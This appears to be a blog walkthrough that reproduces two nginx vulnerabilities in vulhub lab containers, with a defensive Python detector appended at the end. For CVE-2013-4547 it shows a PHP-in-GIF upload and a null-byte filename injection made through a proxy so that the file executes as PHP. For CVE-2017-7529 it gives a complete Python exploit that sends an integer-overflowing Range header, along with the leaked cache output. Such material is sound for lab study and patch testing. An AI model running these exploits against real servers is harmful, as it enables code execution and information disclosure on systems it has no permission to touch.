Nginx Vulnerability Reproduction

Published: 2025-04-09 ⋅ Reads: 78 ⋅ Likes: 0

Set up the target environment with vulhub.

Nginx filename logic vulnerability (CVE-2013-4547)

Upload 1.gif with the following content:

<?php phpinfo();?>

Request the file at http://your-ip:8080/uploadfiles/1.gif[0x20][0x00].php; the 0x00 byte cannot be typed into the URL, so the request has to be modified in a proxy.

First request /uploadfiles/1.gif a.php (the "a" is only a placeholder), then, in the intercepted request, change the byte 61 ("a") to 00 and forward the packet.

The file is parsed as PHP successfully.

Nginx out-of-bounds cache read vulnerability (CVE-2017-7529)

Start the environment with docker and run the PoC against it directly.

import requests
import time
import urllib3


def cve20177529():
    try:
        # Build the request headers
        headers = {
            'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
        }
        url = input('请输入目标URL:')

        # Get the length of a normal response.
        # verify=False skips SSL certificate validation; allow_redirects=False stops redirects from causing false positives
        r1 = requests.get(url, headers=headers, verify=False, allow_redirects=False)
        url_len = len(r1.content)

        # Make the requested length larger than the normal response length
        addnum = 200
        final_len = url_len + addnum

        # Build the Range header (two suffix ranges whose sizes sum past a signed 64-bit value) and add it to headers
        headers['Range'] = "bytes=-%d,-%d" % (final_len, 0x8000000000000000 - final_len)

        # Send the request with the new headers and report the result
        r2 = requests.get(url, headers=headers, verify=False, allow_redirects=False)
        text = r2.text
        code = r2.status_code
        timestamp = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
        if 'ETag' in text and code == 206:
            print('存在Nginx整数溢出漏洞(CVE-2017-7529),已输出到cve20177529_log.txt')

            # Write the result to the log file
            with open('cve20177529_log.txt', 'a', encoding="utf-8") as f:
                f.write('存在Nginx整数溢出漏洞(CVE-2017-7529)-------------' + timestamp + '-------------\n' + text)
        else:
            print('未检测到漏洞')

            # Write the result to the log file
            with open('cve20177529_log.txt', 'a', encoding="utf-8") as f:
                f.write('未检测到漏洞-------------' + timestamp + '-------------\n' + text)

    except Exception as result:
        print(result)


if __name__ == "__main__":
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    cve20177529()

Output written to cve20177529_log.txt:

存在Nginx整数溢出漏洞(CVE-2017-7529)-------------2025-04-08 19:26:35-------------


--00000000000000000002

Content-Type: text/html; charset=utf-8

Content-Range: bytes -200-611/612



, 08 Apr 2025 11:18:02 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 612

Last-Modified: Tue, 27 Jun 2017 13:40:50 GMT

Connection: close

ETag: "59526062-264"

Accept-Ranges: bytes



<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
<style>
    body {
        width: 35em;
        margin: 0 auto;
        font-family: Tahoma, Verdana, Arial, sans-serif;
    }
</style>
</head>
<body>
<h1>Welcome to nginx!</h1>
<p>If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.</p>

<p>For online documentation and support please refer to
<a href="http://nginx.org/">nginx.org</a>.<br/>
Commercial support is available at
<a href="http://nginx.com/">nginx.com</a>.</p>

<p><em>Thank you for using nginx.</em></p>
</body>
</html>


--00000000000000000002

Content-Type: text/html; charset=utf-8

Content-Range: bytes -9223372036854774384-611/612



Sensitive information is obtained.
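As an added example (not from the original post, vulhub or nginx), the following Python models, from the defender's side, what the Range header built by the script above does to a naive range parser: a suffix range longer than the file yields a negative start (the "bytes -200-611/612" seen in the log), and the two range sizes sum to exactly 2^63, which wraps to a negative number in a signed 64-bit counter and so slips past a "total size must not exceed content length" check. The function names, the int64 wrapping helper and the sample values (content length 612, as in the log above) are assumptions made for this illustration.

```python
import re


def to_int64(value):
    """Wrap a Python int to signed 64-bit, the way an off_t addition would (assumed helper)."""
    value &= (1 << 64) - 1
    return value - (1 << 64) if value >= (1 << 63) else value


def parse_byte_ranges(range_header, content_length):
    """Parse 'bytes=a-b,-n,...' into the (start, end) pairs a naive range filter
    would compute; suffix ranges are resolved against content_length without
    clamping, which is what the Content-Range lines in the log show. end is inclusive."""
    m = re.fullmatch(r"\s*bytes=(.*)", range_header)
    if not m:
        raise ValueError("not a byte-range header")
    ranges = []
    for spec in m.group(1).split(","):
        first, _, last = spec.strip().partition("-")
        if first == "":                               # suffix range: last n bytes
            start = content_length - int(last)        # negative when n > content_length
            end = content_length - 1
        else:
            start = int(first)
            end = int(last) if last else content_length - 1
        ranges.append((start, end))
    return ranges


def assess_range_request(range_header, content_length):
    """Classify a Range header the way a WAF or log rule for CVE-2017-7529 would:
    flag negative starts, and flag a summed range size that wraps negative or
    exceeds the file length. Returns a dict so the caller can log each signal."""
    ranges = parse_byte_ranges(range_header, content_length)
    negative_start = any(start < 0 for start, _ in ranges)
    total = to_int64(sum(end - start + 1 for start, end in ranges))
    return {
        "ranges": ranges,
        "negative_start": negative_start,
        "total_size_wrapped": total < 0,
        "suspicious": negative_start or total < 0 or total > content_length,
    }


if __name__ == "__main__":
    # Constructed sample: the exact header the script sends for a 612-byte page
    # (url_len=612, addnum=200), as recorded in the log above.
    print(assess_range_request("bytes=-812,-9223372036854774996", 612))
    print(assess_range_request("bytes=0-99,-100", 612))
```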

